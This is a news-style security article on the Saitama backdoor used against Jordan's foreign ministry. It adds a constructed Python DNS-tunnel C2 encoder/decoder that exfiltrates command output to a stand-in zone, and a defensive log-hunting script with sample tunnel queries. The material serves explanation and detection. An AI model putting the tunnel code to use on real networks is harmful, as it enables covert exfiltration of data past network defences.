New Saitama backdoor Targeted Official from Jordan’s Foreign Ministry

May 13, 2022


A spear-phishing campaign targeting Jordan's foreign ministry has been observed dropping a new stealthy backdoor dubbed Saitama.

Researchers from Malwarebytes and Fortinet FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat actor tracked under the moniker APT34, citing resemblances to past campaigns staged by the group.

"Like many of these attacks, the email contained a malicious attachment," Fortinet researcher Fred Gutierrez said. "However, the attached threat was not a garden-variety malware. Instead, it had the capabilities and techniques usually associated with advanced persistent threats (APTs)."

APT34, also known as OilRig, Helix Kitten, and Cobalt Gypsy, is known to have been active since at least 2014 and has a track record of striking the telecom, government, defense, oil, and financial sectors in the Middle East and North Africa (MENA) via targeted phishing attacks.

Earlier this February, ESET tied the group to a long-running intelligence-gathering operation aimed at diplomatic organizations, technology companies, and medical organizations in Israel, Tunisia, and the United Arab Emirates.


The newly observed phishing message contains a weaponized Microsoft Excel document. Opening it prompts the potential victim to enable macros, leading to the execution of a malicious Visual Basic for Applications (VBA) macro that drops the malware payload ("update.exe").

In addition, the macro takes care of establishing persistence for the implant by adding a scheduled task that repeats every four hours.

A .NET-based binary, Saitama uses the DNS protocol for its command-and-control (C2) communications as part of an effort to disguise its traffic, while using a "finite-state machine" approach to executing commands received from the C2 server.

"In the end, this basically means that this malware is receiving tasks inside a DNS response," Gutierrez said. DNS tunneling, as the technique is called, makes it possible to encode the data of other programs or protocols in DNS queries and responses. Because hosts typically hand every lookup to the enterprise resolver, which in turn forwards it to the authoritative server for the attacker's zone, the traffic crosses the perimeter even where direct outbound connections are blocked, which is why resolver logs are the natural place to look for it.

In the final step, the results of the command execution are sent back to the C2 server, with the exfiltrated data built into a DNS request.
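To make the two directions of the exchange concrete, here is an added, constructed example of a DNS-tunnel C2 round trip; it is not Saitama's code, and the zone name (`example.invalid`), the `<seq>.<data>.<session>.<zone>` label layout and the A-record task framing are assumptions chosen for illustration. The implant side splits command output into hostname labels (base32, so only `[a-z2-7]`, within the 63-octet label and 253-character name limits), and the server side reassembles queries that arrive out of order or duplicated, as they do when resolvers retry. The server side packs a task into the answer section as A records, which the implant decodes. Both halves run offline without a resolver.

```python
"""Toy DNS-tunnel C2 exchange: results in query names, tasks in A records.

Constructed for illustration; it is not Saitama's code and the framing
(zone name, label layout, A-record task encoding) is an assumption.
"""
import base64
from typing import Dict, List, Optional, Tuple

C2_DOMAIN = "example.invalid"  # assumed attacker-controlled zone
MAX_LABEL = 63                 # RFC 1035: one label is at most 63 octets
MAX_NAME = 253                 # RFC 1035: a full name is at most 253 chars


def _b32(data: bytes) -> str:
    """Unpadded lowercase base32: only [a-z2-7], legal in any hostname label."""
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


# --- implant -> server: command output carried in query names -------------

def encode_result_queries(session: str, output: bytes) -> List[str]:
    """Split output into names of the form
    <seq>.<b32 label>[.<b32 label>...].<session>.C2_DOMAIN
    seq is a 4-digit counter so the server can reorder and de-duplicate."""
    encoded = _b32(output)
    fixed = 4 + 1 + len(session) + 1 + len(C2_DOMAIN)   # "0000." and ".sess.zone"
    labels_per_query = (MAX_NAME - fixed) // (MAX_LABEL + 1)
    chars_per_query = labels_per_query * MAX_LABEL
    names: List[str] = []
    for seq, i in enumerate(range(0, len(encoded), chars_per_query)):
        piece = encoded[i:i + chars_per_query]
        labels = [piece[j:j + MAX_LABEL] for j in range(0, len(piece), MAX_LABEL)]
        names.append(f"{seq:04d}." + ".".join(labels) + f".{session}.{C2_DOMAIN}")
    return names


def parse_result_query(name: str) -> Optional[Tuple[int, str, str]]:
    """Server side: (seq, b32 data, session) for a tunnel query, else None."""
    suffix = "." + C2_DOMAIN
    if not name.endswith(suffix):
        return None
    labels = name[: -len(suffix)].split(".")
    if len(labels) < 3 or not labels[0].isdigit():
        return None
    return int(labels[0]), "".join(labels[1:-1]), labels[-1]


def decode_result_queries(names: List[str]) -> Tuple[Optional[str], bytes]:
    """Reassemble queries that may arrive out of order or duplicated
    (resolvers retry); names that are not ours are ignored."""
    parts: Dict[int, str] = {}
    session = None
    for name in names:
        parsed = parse_result_query(name)
        if parsed is None:
            continue
        seq, data, session = parsed
        parts.setdefault(seq, data)          # first copy wins on duplicates
    return session, _unb32("".join(parts[k] for k in sorted(parts)))


# --- server -> implant: a task carried in the answer section -------------

def encode_task_as_a_records(task: bytes) -> List[str]:
    """Pack a task into A records: a 4-byte big-endian length, then the
    task bytes, 4 bytes per address, zero-padded to a whole record."""
    framed = len(task).to_bytes(4, "big") + task
    framed += b"\x00" * (-len(framed) % 4)
    return [".".join(str(b) for b in framed[i:i + 4]) for i in range(0, len(framed), 4)]


def decode_task_from_a_records(addrs: List[str]) -> bytes:
    raw = b"".join(bytes(int(o) for o in a.split(".")) for a in addrs)
    return raw[4:4 + int.from_bytes(raw[:4], "big")]


if __name__ == "__main__":
    # Round trip with a deliberately long output and reversed delivery order.
    output = b"whoami\r\njordan\\user1\r\n" + b"x" * 5000
    queries = encode_result_queries("s7k2", output)
    print(len(queries), "queries;", decode_result_queries(queries[::-1])[1] == output)
    print(encode_task_as_a_records(b"whoami"))  # ['0.0.0.6', '119.104.111.97', '109.105.0.0']
```

The 4-digit sequence label is what makes the server tolerant of the resolver's own behaviour: recursive resolvers retry, cache and reorder, so a tunnel that assumed in-order single delivery would silently corrupt exfiltrated output. The same label is also a detection handle, since real hostnames rarely start with a zero-padded counter.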

"With the amount of work put into developing this malware, it does not appear to be the type to execute once and then delete itself, like other stealthy infostealers," Gutierrez said.

"Perhaps to avoid triggering any behavioral detections, this malware also does not create any persistence mechanisms. Instead, it relies on the Excel macro to create persistence by way of a scheduled task."
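Since the implant itself writes no persistence artifact and its only network footprint is DNS, the practical hunting ground is the resolver log. The following is an added, constructed example of that hunt, not Fortinet's or Malwarebytes' detection logic: it scores each query's subdomain on length and Shannon entropy (base32-encoded data approaches 5 bits per character, while dictionary-word hostnames sit well below) and only alerts on a zone once several distinct such subdomains have been seen. The log format, the sample lines, the zone `example.invalid` and the thresholds are all assumptions; a real deployment should also derive the registered domain from the Public Suffix List rather than the last-two-labels shortcut used here.

```python
"""Hunt for DNS-tunnel-like query patterns in resolver logs.

Constructed example; not vendor detection logic. Log format
(timestamp client qname qtype), sample lines, zone and thresholds are
assumptions. The tunnel lines mimic base32 labels under an assumed zone.
"""
import math
from collections import defaultdict
from typing import Dict, List, Tuple

SAMPLE_LOG = """\
1652400000.101 10.0.0.23 www.example.com A
1652400000.322 10.0.0.23 ocsp.digicert.com A
1652400001.010 10.0.0.23 0000.nbuxa3lpmfwqkdjknvxrg23tmuxxe4dfebvgs2ndejshuzbuo5rtel3fkvpe.s7k2.example.invalid A
1652400001.480 10.0.0.23 d1a2b3c4e5f6g7.cloudfront.net A
1652400002.015 10.0.0.23 0001.mfrgg43tnvsxg5dboi2gk3lpmzuwy4ddizzxk2tdm5pxg4ldmzzwczl2oj4h.s7k2.example.invalid A
1652400003.020 10.0.0.23 0002.krugkidroviwg2ltmnqwwzlnonxwg2bjmfzgsy3fnrxw2lsnfzgs4dnobqwiz.s7k2.example.invalid A
1652400004.030 10.0.0.23 0003.obzhg5lsnvswkzlfnfyxmzltnvzwyzlmmnuwcytejjrg6ltlmnygc3tsnf2g.s7k2.example.invalid A
1652400005.000 10.0.0.23 poll.s7k2.example.invalid A
1652400006.000 10.0.0.42 mail.google.com A
1652400007.000 10.0.0.42 www.example.com A
"""

MIN_SUBDOMAIN_LEN = 40   # assumed tuning; hostnames this long are rare outside CDNs
MIN_ENTROPY = 3.5        # bits/char; base32 text approaches 5.0, words sit near 2-3
MIN_UNIQUE = 3           # distinct long subdomains per zone before alerting


def shannon_entropy(text: str) -> float:
    """Bits per character of the observed symbol distribution."""
    if not text:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str) -> Tuple[str, str]:
    """(registered domain, subdomain) using the last-two-labels shortcut."""
    labels = qname.rstrip(".").split(".")
    if len(labels) < 3:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def hunt(lines: List[str]) -> Dict[str, dict]:
    """Return zones whose subdomains look like encoded data: long,
    high-entropy and numerous. One finding per zone with its evidence."""
    suspects: Dict[str, dict] = defaultdict(
        lambda: {"queries": 0, "subdomains": set(), "clients": set()})
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue                       # malformed line; skip, do not crash
        _, client, qname, _ = fields[:4]
        zone, sub = split_name(qname.lower())
        payload = sub.replace(".", "")     # judge the bytes, not the label breaks
        if len(payload) < MIN_SUBDOMAIN_LEN or shannon_entropy(payload) < MIN_ENTROPY:
            continue
        rec = suspects[zone]
        rec["queries"] += 1
        rec["subdomains"].add(sub)
        rec["clients"].add(client)
    return {z: r for z, r in suspects.items() if len(r["subdomains"]) >= MIN_UNIQUE}


if __name__ == "__main__":
    for zone, rec in hunt(SAMPLE_LOG.splitlines()).items():
        print(zone, rec["queries"], "queries from", sorted(rec["clients"]))
```

The per-zone uniqueness count is what keeps the noise down: a single long, random-looking label is common (CDN hashes, tracking subdomains, DNSSEC NSEC3 owner names), but a steady stream of distinct ones under one low-traffic zone from the same client is the shape of an implant reading tasks and pushing results. The short `poll.s7k2.example.invalid` beacon in the sample is deliberately below the length threshold; catching the beacon alone needs a different signal (periodicity per client and zone), which this block does not attempt.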

Parts of this article are sourced from:
thehackernews.com